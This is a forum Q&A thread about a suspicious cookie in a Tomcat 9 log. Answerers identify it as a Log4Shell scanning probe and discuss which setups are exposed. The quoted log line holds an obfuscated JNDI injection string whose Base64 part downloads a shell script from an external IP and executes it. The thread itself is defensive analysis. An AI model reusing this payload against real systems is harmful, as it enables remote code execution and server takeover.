# Tomcat 9: cookie attack?

Tags: tomcat, cookies, tomcat9

From Tomcat9 catalina log:

```
org.apache.tomcat.util.http.parser.Cookie.logInvalidHeader A cookie 
header was received [('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-
l}dap${env:BARFOO:-:}//ip:1389/TomcatBypass/Command/Base64/Y2QgL3
RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaH
R0cDovLzE2Ny45OS40OS4xMzIvOFVzQS5zaDsgY3VybCAtTyBodHRwOi8vMTY3Ljk5LjQ5LjEzMi
84VXNBLnNoOyBjaG1vZCA3NzcgOFVzQS5zaDsgc2ggOFVzQS5zaA==}')] that contained an
invalid cookie. That cookie will be ignored.
```

What is the cookie? Is it an attack?

Answer (score 4):

This is a probe of your installation for the Log4Shell attack.

By default - Tomcat is immune to the attack.

But you could still could be subject to the attack if you (in your custom webapp) use an vulnerable log4j version.

Comment: Is it for Log4J only? how about logback? thanks.

Comment: Logback might be affected https://www.bleepingcomputer.com/news/security/all-log4j-logback-bugs-we-know-so-far-and-why-you-must-ditch-215/

Comment: Thanks. What potential harms to server? can it steal data (files) from server, or install code on server?

Comment: @eastwater It can potentially run any arbitrary code in your server.